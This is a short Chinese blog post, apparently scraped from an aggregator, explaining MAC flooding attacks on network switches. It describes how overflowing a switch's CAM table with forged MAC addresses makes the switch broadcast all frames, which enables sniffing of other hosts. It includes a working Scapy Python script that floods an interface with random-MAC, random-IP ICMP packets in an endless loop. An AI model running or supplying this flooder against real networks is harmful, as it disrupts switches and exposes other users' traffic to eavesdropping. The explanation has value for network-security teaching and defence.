zoukankan      html  css  js  c++  java
  • MAC洪水攻击


    MAC洪水攻击原理

      传统的交换机在数据转发过程中依靠对CAM表的查询来确定正确的转发接口,一旦在查询过程中无法找到相关的目的MAC对应的条目,此数据帧将作为广播帧来处理,CAM表的容量有限,只能存储不多的条目,当CAM表记录的MAC地址达到上限时,新的条目将不会添加到CAM表中。

      基于以上原理,某台PC不断发送去往未知目的地地数据帧,且每个包地源MAC地址都不同,当这样地数据包发送地速度足够快之后,快到在刷新时间内将交换机地CAM表迅速填满。CAM表被这些伪造的MAC地址占据,真实的MAC地址条目却无法进入CAM表。那么任何一个经过交换机的正常单播数据帧都会以广播帧的形式来处理。交换机在此情况下被降级为Hub。

      交换机降级为hub之后,我们就可以监听所有连接到该交换机的主机的数据了。

    #!/usr/bin/python

    import sys
    from scapy.all import *

    packet = Ether(src=RandMAC("*:*:*:*:*:*"),
    dst=RandMAC("*:*:*:*:*:*")) /
    IP(src=RandIP("*.*.*.*"),
    dst=RandIP("*.*.*.*")) /
    ICMP()

    if len(sys.argv) < 2:
    dev = "eth0"
    else:
    dev = sys.argv[1]

    print "Flooding net with random packets on dev " + dev

    sendp(packet, iface=dev, loop=1)

  • 相关阅读:
    生产环境elk
    命令行操作es(转)
    makedown在线生成工具
    网站渗透测试工具zap2docker-stable
    ansible常用单模块
    程序员应该怎样和领导相处(转)
    Css设置毛玻璃
    tar.gz 文件解压
    Ubuntu:命令行安装可视化界面
    汇编语言开发总结
  • 原文地址:https://www.cnblogs.com/blacksunny/p/7018523.html
Copyright © 2011-2022 走看看